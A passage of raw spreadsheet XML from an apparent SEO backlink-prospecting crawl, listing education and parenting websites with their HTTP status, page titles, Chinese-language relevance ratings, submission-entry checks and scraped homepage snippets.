      </x:c>
      <x:c r="F141" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G141" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H141" s="19" t="str">
        <x:v>https://www.swtafe.edu.au/</x:v>
      </x:c>
      <x:c r="I141" s="19" t="str">
        <x:v>South West TAFE</x:v>
      </x:c>
      <x:c r="J141" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K141" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L141" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M141" s="19" t="str">
        <x:v>https://www.swtafe.edu.au/</x:v>
      </x:c>
      <x:c r="N141" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O141" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P141" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q141" s="21" t="str">
        <x:v>This is the home page for South West TAFE located in South West Victoria. SWTAFE is one of the largest regional vocational training providers in Victoria. TAFE offer a wide range of accredited qualifications (certificate and diploma level) including vocational, graduate studies, pre-apprenticeships, apprenticeships, traineeships, short courses, industry training. TAFE's students graduate with practical skills that give them a high chance of employment in their chosen career. South West TAFE Search Menu Courses Courses overview Study Areas Agriculture, Conservation &amp; Horticulture Arts Building &amp; Construction Business &amp; Finance Early Childhood &amp; Education Support English Language Skills Food &amp; Hospitality Hair &amp; Beauty Information Technology Maritime Motorcycle Licences Nursing, Health &amp; Community Services Occupational, Health and Safety Trades Training &amp; Assessment VCE &amp; General Education Other courses Free TAFE Short Courses Free &amp; Subsidised Short Courses Apprenticeships, Traineeships &amp; Pre-apprenticeships Options for School Students VET Delivered to Secondary Students How to Choose a Course Pathways Study with us Study with us overview Why SWTAFE? How to apply</x:v>
      </x:c>
      <x:c r="R141" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S141" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T141" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://swtafe.edu.au</x:v>
      </x:c>
    </x:row>
    <x:row r="142">
      <x:c r="A142" s="18" t="str">
        <x:v>141</x:v>
      </x:c>
      <x:c r="B142" s="19" t="str">
        <x:v>fennies.com</x:v>
      </x:c>
      <x:c r="C142" s="19" t="str">
        <x:v>https://fennies.com</x:v>
      </x:c>
      <x:c r="D142" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E142" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F142" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G142" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H142" s="19" t="str">
        <x:v>https://www.fennies.com/</x:v>
      </x:c>
      <x:c r="I142" s="19" t="str">
        <x:v>Fennies | Award-Winning Nurseries in London, Surrey &amp; Kent</x:v>
      </x:c>
      <x:c r="J142" s="19" t="str">
        <x:v>亲子/资源站</x:v>
      </x:c>
      <x:c r="K142" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L142" s="19" t="str">
        <x:v>首页发现提交相关词</x:v>
      </x:c>
      <x:c r="M142" s="19" t="str">
        <x:v>https://www.fennies.com/</x:v>
      </x:c>
      <x:c r="N142" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O142" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="P142" s="21" t="str">
        <x:v>首页出现提交、资源、合作或投稿相关信号，但尚未深查具体规则。</x:v>
      </x:c>
      <x:c r="Q142" s="21" t="str">
        <x:v>The right start for under 5s. Launch your child's learning journey today, the most extraordinary children's nurseries which open the doors to a world of wonder. Fennies | Award-Winning Nurseries in London, Surrey &amp; Kent About Us Find your nearest Fennies nursery! Search here about us Our Team Who we are FAQs at Fennies What's on Contact us 02087703222 enquiries@fennies.com talent@fennies.com Our Approach Find your nearest Fennies nursery! Search here our approach Why Fennies Fennies Day Curriculum &amp; Pedagogy Food &amp; Nutrition Our Environments Parent Partnerships Contact us 02087703222 enquiries@fennies.com talent@fennies.com Our Nurseries Find your nearest Fennies nursery! Search here Location Surrey our nurseries Fennies Cheam, Worcester Road Fennies Croydon, Addiscombe Road Fennies Croydon, Lower Addiscombe Road Fennies Epsom, Hook Road Fennies Hor</x:v>
      </x:c>
      <x:c r="R142" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S142" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T142" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://fennies.com</x:v>
      </x:c>
    </x:row>
    <x:row r="143">
      <x:c r="A143" s="18" t="str">
        <x:v>142</x:v>
      </x:c>
      <x:c r="B143" s="19" t="str">
        <x:v>babydevotions.com</x:v>
      </x:c>
      <x:c r="C143" s="19" t="str">
        <x:v>https://babydevotions.com</x:v>
      </x:c>
      <x:c r="D143" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E143" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F143" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G143" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H143" s="19" t="str">
        <x:v>https://www.nasaacademygirls.org/</x:v>
      </x:c>
      <x:c r="I143" s="19" t="str">
        <x:v>KOITOTO : Rekomendasi Bandar Situs Togel Online 4D Terlengkap Pilihan Masa Kini</x:v>
      </x:c>
      <x:c r="J143" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K143" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L143" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M143" s="19" t="str">
        <x:v>https://www.nasaacademygirls.org/</x:v>
      </x:c>
      <x:c r="N143" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O143" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P143" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q143" s="21" t="str">
        <x:v>KOITOTO : Rekomendasi Bandar Situs Togel Online 4D Terlengkap Pilihan Masa Kini Cari kami di Google : KOITOTO Rekomendasi Bandar Situs Togel Online 4D Deposit Murah Gampang Maxwin Nikmati pasaran togel nya yang paling lengkap " data-search-history-clock=" " autocomplete="off" spellcheck="false" autocapitalize="off" autocorrect="off" placeholder="" tabIndex="1" /&gt; Explore Categories Popular Products KOITOTO SITUS TOGEL BANDAR TOGEL TOGEL 4D TOGEL ONLINE SITUS TOGEL 4D SITUS TOGEL ONLINE BANDAR TOGEL ONLINE LOGIN DAFTAR Design ID: 74165272 74165272 1 false 1 KOITOTO : Rekomendasi Bandar Situs Togel Online 4D Terlengkap Pilihan Masa Kini $3 IDR 10.000 Create an account to favorite this design! </x:v>
      </x:c>
      <x:c r="R143" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S143" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T143" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://babydevotions.com</x:v>
      </x:c>
    </x:row>
    <x:row r="144">
      <x:c r="A144" s="18" t="str">
        <x:v>143</x:v>
      </x:c>
      <x:c r="B144" s="19" t="str">
        <x:v>familyfunandbeyond.com</x:v>
      </x:c>
      <x:c r="C144" s="19" t="str">
        <x:v>https://familyfunandbeyond.com</x:v>
      </x:c>
      <x:c r="D144" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E144" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F144" s="20"/>
      <x:c r="G144" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H144" s="19" t="str"/>
      <x:c r="I144" s="19" t="str"/>
      <x:c r="J144" s="19" t="str">
        <x:v>可能相关站点</x:v>
      </x:c>
      <x:c r="K144" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L144" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M144" s="19" t="str">
        <x:v>https://familyfunandbeyond.com</x:v>
      </x:c>
      <x:c r="N144" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O144" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P144" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q144" s="21" t="str"/>
      <x:c r="R144" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S144" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T144" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://familyfunandbeyond.com
http://familyfunandbeyond.com</x:v>
      </x:c>
    </x:row>
    <x:row r="145">
      <x:c r="A145" s="18" t="str">
        <x:v>144</x:v>
      </x:c>
      <x:c r="B145" s="19" t="str">
        <x:v>positivebloom.com</x:v>
      </x:c>
      <x:c r="C145" s="19" t="str">
        <x:v>https://positivebloom.com</x:v>
      </x:c>
      <x:c r="D145" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E145" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F145" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G145" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H145" s="19" t="str">
        <x:v>https://positivebloom.com/</x:v>
      </x:c>
      <x:c r="I145" s="19" t="str">
        <x:v>- Positivebloom</x:v>
      </x:c>
      <x:c r="J145" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K145" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L145" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M145" s="19" t="str">
        <x:v>https://positivebloom.com/</x:v>
      </x:c>
      <x:c r="N145" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O145" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P145" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q145" s="21" t="str">
        <x:v>GARDENING BY STATE Every state gardens differently—and so should you. What grows and works best in your state Seasonal care for gardens, flowers, and yards Climate-smart tips for plants and outdoor spaces. FLORIDA CALIFORNIA TEXAS OREGON NEW YORK OHIO Plant Care &amp; Flowers Easy tips to help flowers and plants grow healthier and last longer.&amp;hellip; - Positivebloom Skip to content PLANT CARE &amp; FLOWERS FLOWERING PLANTS INDOOR TREES SUCCULENTS AND CACTUSES PLANT VS PLANT EDIBLE GARDENING FRUITS VEGETABLES HERBS GROWING TIPS YARD &amp; LANDSCAPING LAWN CARE LAWN GRASSES TREES AND SHRUBS WEEDS GARDENING BY STATE Editorial Policy &amp; Standards GARDENING BY STATE Every state gardens differently—and so should you. What grows and works best in your state Seasonal care for gardens, flowers, and yards Climate-smart tips for plants and outdoor spaces. FLORIDA CALIFORNIA TEXAS OREGON NEW YORK OHIO SEE ALL STATES Plant Care &amp; Flowers Easy tips to help flowers and plants grow healthier and last longer. FLOWERING PLANTS INDOOR TREES SUCCULENTS &amp; CACTI PLANT</x:v>
      </x:c>
      <x:c r="R145" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S145" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T145" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://positivebloom.com</x:v>
      </x:c>
    </x:row>
    <x:row r="146">
      <x:c r="A146" s="18" t="str">
        <x:v>145</x:v>
      </x:c>
      <x:c r="B146" s="19" t="str">
        <x:v>twinkl.it</x:v>
      </x:c>
      <x:c r="C146" s="19" t="str">
        <x:v>https://twinkl.it</x:v>
      </x:c>
      <x:c r="D146" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E146" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F146" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G146" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H146" s="19" t="str">
        <x:v>https://www.twinkl.it/</x:v>
      </x:c>
      <x:c r="I146" s="19" t="str"/>
      <x:c r="J146" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K146" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L146" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M146" s="19" t="str">
        <x:v>https://www.twinkl.it/</x:v>
      </x:c>
      <x:c r="N146" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O146" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P146" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q146" s="21" t="str"/>
      <x:c r="R146" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S146" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T146" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.it</x:v>
      </x:c>
    </x:row>
    <x:row r="147">
      <x:c r="A147" s="18" t="str">
        <x:v>146</x:v>
      </x:c>
      <x:c r="B147" s="19" t="str">
        <x:v>ozaukeefamilyservices.org</x:v>
      </x:c>
      <x:c r="C147" s="19" t="str">
        <x:v>https://ozaukeefamilyservices.org</x:v>
      </x:c>
      <x:c r="D147" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E147" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F147" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G147" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H147" s="19" t="str">
        <x:v>https://www.ozaukeefamilyservices.org/</x:v>
      </x:c>
      <x:c r="I147" s="19" t="str">
        <x:v>Home | Ozaukee Family Services | Ozaukee County</x:v>
      </x:c>
      <x:c r="J147" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K147" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L147" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M147" s="19" t="str">
        <x:v>https://www.ozaukeefamilyservices.org/</x:v>
      </x:c>
      <x:c r="N147" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O147" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P147" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q147" s="21" t="str">
        <x:v>Ozaukee Family Services is a non-profit agency that serves all of Ozaukee County with a mission of building mental wellness and strengthening families. Home | Ozaukee Family Services | Ozaukee County top of page Home About Volunteer Programs Behavioral Health Family Education &amp; Support Prevention Education Senior Services Counseling Playgroups &amp; Workshops Compass Fall Luncheon More Use tab to navigate through the menu items. DONATE Building mental wellness and strengthening families. Ozaukee Family Services is a non-profit agency that serves all of Ozaukee County with a mission of &amp;ldquo;building mental wellness and strengthening families.&amp;rdquo; All services are free or offered on a sliding fee scale &amp;ndash; no one is ever turned away because of the inability to pay. ​ Everything we do falls into one of our four core pillars of programming</x:v>
      </x:c>
      <x:c r="R147" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S147" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T147" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://ozaukeefamilyservices.org</x:v>
      </x:c>
    </x:row>
    <x:row r="148">
      <x:c r="A148" s="18" t="str">
        <x:v>147</x:v>
      </x:c>
      <x:c r="B148" s="19" t="str">
        <x:v>theyouthdesk.com</x:v>
      </x:c>
      <x:c r="C148" s="19" t="str">
        <x:v>https://theyouthdesk.com</x:v>
      </x:c>
      <x:c r="D148" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E148" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F148" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G148" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H148" s="19" t="str">
        <x:v>https://theyouthdesk.com/</x:v>
      </x:c>
      <x:c r="I148" s="19" t="str">
        <x:v>The Youth Desk | Helping Librarians Spread the Joy of Reading</x:v>
      </x:c>
      <x:c r="J148" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K148" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L148" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M148" s="19" t="str">
        <x:v>https://theyouthdesk.com/</x:v>
      </x:c>
      <x:c r="N148" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O148" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P148" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q148" s="21" t="str">
        <x:v>Library program plans, outreach ideas, book lists, and book-ish inspiration for youth &amp; tween librarians, educators, and parents. The Youth Desk | Helping Librarians Spread the Joy of Reading Skip to content Trending Post : Fall Sensory &amp; Toddler Storytime Baby Storytime Sensory Storytime Book Clubs Outreach Programs Blog About What’s New See All &gt; Book Club Guide for A Potion, a Powder, a Little Bit of Magic September 1, 2026 July 27, 2026 Firefighter Sensory &amp; Toddler Storytime August 18, 2026 August 19, 2026 Space Baby Storytime August 4, 2026 August 4, 2026 Book Club Guide for A Hero’s Guide to Summer Vacation July 21, 2026 July 1, 2026 Spreading the Joy of Reading One Library Patron at a Time Need fresh programming ideas? See the full list of library programs below, including lesson plans, outlines, and scripts. S</x:v>
      </x:c>
      <x:c r="R148" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S148" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T148" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://theyouthdesk.com</x:v>
      </x:c>
    </x:row>
    <x:row r="149">
      <x:c r="A149" s="18" t="str">
        <x:v>148</x:v>
      </x:c>
      <x:c r="B149" s="19" t="str">
        <x:v>rachelreiter.com</x:v>
      </x:c>
      <x:c r="C149" s="19" t="str">
        <x:v>https://rachelreiter.com</x:v>
      </x:c>
      <x:c r="D149" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E149" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F149" s="20"/>
      <x:c r="G149" s="19" t="str">
        <x:v>无法连接</x:v>
      </x:c>
      <x:c r="H149" s="19" t="str"/>
      <x:c r="I149" s="19" t="str"/>
      <x:c r="J149" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="K149" s="19" t="str">
        <x:v>未知</x:v>
      </x:c>
      <x:c r="L149" s="19" t="str">
        <x:v>未取得页面</x:v>
      </x:c>
      <x:c r="M149" s="19" t="str">
        <x:v>https://rachelreiter.com</x:v>
      </x:c>
      <x:c r="N149" s="19" t="str">
        <x:v>无法核验</x:v>
      </x:c>
      <x:c r="O149" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P149" s="21" t="str">
        <x:v>首页超时或无法连接，不能据此判断站点是否接受外链。</x:v>
      </x:c>
      <x:c r="Q149" s="21" t="str"/>
      <x:c r="R149" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S149" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T149" s="21" t="str">
        <x:v>fetch failed | fetch failed | 请求: https://rachelreiter.com
http://rachelreiter.com</x:v>
      </x:c>
    </x:row>
    <x:row r="150">
      <x:c r="A150" s="18" t="str">
        <x:v>149</x:v>
      </x:c>
      <x:c r="B150" s="19" t="str">
        <x:v>am1280thepatriot.com</x:v>
      </x:c>
      <x:c r="C150" s="19" t="str">
        <x:v>https://am1280thepatriot.com</x:v>
      </x:c>
      <x:c r="D150" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E150" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F150" s="20" t="str">
        <x:v>403</x:v>
      </x:c>
      <x:c r="G150" s="19" t="str">
        <x:v>HTTP错误</x:v>
      </x:c>
      <x:c r="H150" s="19" t="str">
        <x:v>https://am1280thepatriot.com/</x:v>
      </x:c>
      <x:c r="I150" s="19" t="str">
        <x:v>Attention Required! | Cloudflare</x:v>
      </x:c>
      <x:c r="J150" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K150" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L150" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M150" s="19" t="str">
        <x:v>https://am1280thepatriot.com/</x:v>
      </x:c>
      <x:c r="N150" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O150" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P150" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q150" s="21" t="str">
        <x:v>Attention Required! | Cloudflare Please enable cookies. Sorry, you have been blocked You are unable to access am1280thepatriot.com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a349b9410ca96506 &amp;bull; Your IP: </x:v>
      </x:c>
      <x:c r="R150" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S150" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T150" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://am1280thepatriot.com</x:v>
      </x:c>
    </x:row>
    <x:row r="151">
      <x:c r="A151" s="18" t="str">
        <x:v>150</x:v>
      </x:c>
      <x:c r="B151" s="19" t="str">
        <x:v>twinkl.com.co</x:v>
      </x:c>
      <x:c r="C151" s="19" t="str">
        <x:v>https://twinkl.com.co</x:v>
      </x:c>
      <x:c r="D151" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E151" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F151" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G151" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H151" s="19" t="str">
        <x:v>https://www.twinkl.com.co/</x:v>
      </x:c>
      <x:c r="I151" s="19" t="str"/>
      <x:c r="J151" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K151" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L151" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M151" s="19" t="str">
        <x:v>https://www.twinkl.com.co/</x:v>
      </x:c>
      <x:c r="N151" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O151" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P151" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q151" s="21" t="str"/>
      <x:c r="R151" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S151" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T151" s="21" t="str">
        <x:v>如有特殊合作关系，再单独人工复核。 | 请求: https://twinkl.com.co</x:v>
      </x:c>
    </x:row>
    <x:row r="152">
      <x:c r="A152" s="18" t="str">
        <x:v>151</x:v>
      </x:c>
      <x:c r="B152" s="19" t="str">
        <x:v>entertainyourtoddler.com</x:v>
      </x:c>
      <x:c r="C152" s="19" t="str">
        <x:v>https://entertainyourtoddler.com</x:v>
      </x:c>
      <x:c r="D152" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E152" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F152" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G152" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H152" s="19" t="str">
        <x:v>https://entertainyourtoddler.com/</x:v>
      </x:c>
      <x:c r="I152" s="19" t="str">
        <x:v>Life is Better When You Play Together - Entertain Your Toddler</x:v>
      </x:c>
      <x:c r="J152" s="19" t="str">
        <x:v>教育/教师站</x:v>
      </x:c>
      <x:c r="K152" s="19" t="str">
        <x:v>中</x:v>
      </x:c>
      <x:c r="L152" s="19" t="str">
        <x:v>未发现公开投稿入口</x:v>
      </x:c>
      <x:c r="M152" s="19" t="str">
        <x:v>https://entertainyourtoddler.com/</x:v>
      </x:c>
      <x:c r="N152" s="19" t="str">
        <x:v>需人工核验</x:v>
      </x:c>
      <x:c r="O152" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P152" s="21" t="str">
        <x:v>主题可能相关，但首页未确认公开投稿入口；需要人工打开联系页和站内搜索。</x:v>
      </x:c>
      <x:c r="Q152" s="21" t="str">
        <x:v>Life is Better When You Play Together - Entertain Your Toddler Follow Us! Entertain Your Toddler Play at Home Baby Toddler Arts &amp; Crafts Fine Motor Skills Gross Motor Skills Sensory Play Preschool Dramatic Play Literacy STEM Indoor Activities Supply List Parent Life Breastfeeding Family Fun Toy Ideas Organization Potty Training 80+ Jokes for Kids That Are Clean and Hilarious Shop Cart ENTERTAIN YOUR TODDLER LONGER WITH LESS PREP The activity search starts and stops here. I'm Just Here To Browse Browse through tons of free activities on our blog. BROWSE ACTIVITIES I Want to Find The Perfect Activity Use our activity finder to search for an activity by a specific category. By Most Recent Garde</x:v>
      </x:c>
      <x:c r="R152" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S152" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T152" s="21" t="str">
        <x:v>这是候选，不代表一定能获得 backlink。 | 请求: https://entertainyourtoddler.com</x:v>
      </x:c>
    </x:row>
    <x:row r="153">
      <x:c r="A153" s="18" t="str">
        <x:v>152</x:v>
      </x:c>
      <x:c r="B153" s="19" t="str">
        <x:v>searchingandshopping.com</x:v>
      </x:c>
      <x:c r="C153" s="19" t="str">
        <x:v>https://searchingandshopping.com</x:v>
      </x:c>
      <x:c r="D153" s="20" t="str">
        <x:v>1</x:v>
      </x:c>
      <x:c r="E153" s="20" t="str">
        <x:v>0</x:v>
      </x:c>
      <x:c r="F153" s="20" t="str">
        <x:v>200</x:v>
      </x:c>
      <x:c r="G153" s="19" t="str">
        <x:v>可访问</x:v>
      </x:c>
      <x:c r="H153" s="19" t="str">
        <x:v>https://searchingandshopping.com/</x:v>
      </x:c>
      <x:c r="I153" s="19" t="str">
        <x:v>Searching And Shopping</x:v>
      </x:c>
      <x:c r="J153" s="19" t="str">
        <x:v>非目标主题/普通站点</x:v>
      </x:c>
      <x:c r="K153" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="L153" s="19" t="str">
        <x:v>未发现</x:v>
      </x:c>
      <x:c r="M153" s="19" t="str">
        <x:v>https://searchingandshopping.com/</x:v>
      </x:c>
      <x:c r="N153" s="19" t="str">
        <x:v>不建议</x:v>
      </x:c>
      <x:c r="O153" s="19" t="str">
        <x:v>低</x:v>
      </x:c>
      <x:c r="P153" s="21" t="str">
        <x:v>首页主题与科学教育单位换算关联弱，且未发现明确的公开投稿或资源提交入口。</x:v>
      </x:c>
      <x:c r="Q153" s="21" t="str">
        <x:v>Discover Cabinet Door Organizers at a great price. Our Kitchen Storage Organization category offers a great selection of Cabinet Door Organizers and more. Searching And Shopping Skip to content Welcome to our store Home Catalog Blog Blog Tips FAQ Guides Country/region Japan | USD $ Search Afghanistan USD $ Åland Islands USD $ Albania USD $ Algeria USD $ Andorra USD $ Angola USD $ Anguilla USD $ Antigua &amp; Barbuda USD $ Argentina USD $ Armenia USD $ Aruba USD $ Ascension Island USD $ Australia USD $ Austria USD $ Azerbaijan USD $ Bahamas USD $ Bahrain USD $ Bangladesh USD $ Barbados USD $ Belarus USD $ Belgium USD $ Belize USD $ Benin USD $ Bermuda USD $ Bhutan USD $ Bolivia USD $ Bosnia &amp; Herzegovina USD $ Botswana USD $ Brazil USD $ British Indian Ocean Territory USD $ British Virgin Islands USD $ Brunei USD $ Bulgaria USD $ Burkina Faso USD $</x:v>
      </x:c>
      <x:c r="R153" s="19" t="str">
        <x:v>首页访问+规则初筛</x:v>
      </x:c>
      <x:c r="S153" s="22" t="n">
        <x:v>46267.18271381944</x:v>
      </x:c>
      <x:c r="T153" s="21" t="str">
